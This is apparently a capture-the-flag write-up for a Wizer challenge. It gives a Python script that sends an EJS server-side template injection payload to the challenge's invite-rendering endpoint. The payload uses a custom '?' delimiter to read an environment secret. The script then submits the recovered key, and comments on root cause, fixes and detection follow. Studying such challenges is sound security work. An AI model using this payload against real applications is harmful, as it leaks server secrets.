Wizer - Challenge 6 - EJS SSTI (server-side template injection)

Exploit

import requests

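# Invite-rendering endpoint of the challenge; both requests below go to it.
url = "https://call6.vercel.app/renderInvite"

# requests applies no timeout by default, so a stalled connection would block
# the script indefinitely; every call below passes this bound explicitly.
TIMEOUT_SECONDS = 10

# Request 1: the JSON body carries the template text AND the EJS `delimiter`
# option. With "?" as delimiter the output tag is written `<?= ... ?>` instead
# of the default `<%= ... %>`.
# NOTE(review): the server code is not shown on this page. Presumably both
# fields reach the EJS render call unchanged, and any input filter keyed on
# the default `<%` tag would not match `<?` -- confirm against the handler.
#
# Root cause to fix on the server side:
#   * the template is attacker-controlled; templates should be fixed files or
#     constants, with request data passed only as render data (locals);
#   * request fields must never be forwarded into render options such as
#     `delimiter`;
#   * secrets should not live in the environment of the process that renders
#     templates, since the expression here reads `process.env` directly.
# Detection: a body on this endpoint containing a `delimiter` field or
# template tag sequences is worth logging and alerting on.
r = requests.post(
    url,
    json={
        "template": "<?= process.env.champ_key ?>",
        "delimiter": "?"
    },
    timeout=TIMEOUT_SECONDS,
)

print(r.text)


# Value recorded by the author after the first request (apparently the
# rendered content of process.env.champ_key):
# 7G75EDA67593A5544GE123AB55890F06564ABC124


# Request 2: send the recorded value back as `champ_key` to the same endpoint.
# NOTE(review): presumably this is the challenge's completion check; the page
# does not show the expected response.
r = requests.post(
    url,
    json={
        "champ_key": "7G75EDA67593A5544GE123AB55890F06564ABC124"
    },
    timeout=TIMEOUT_SECONDS,
)

print(r.text)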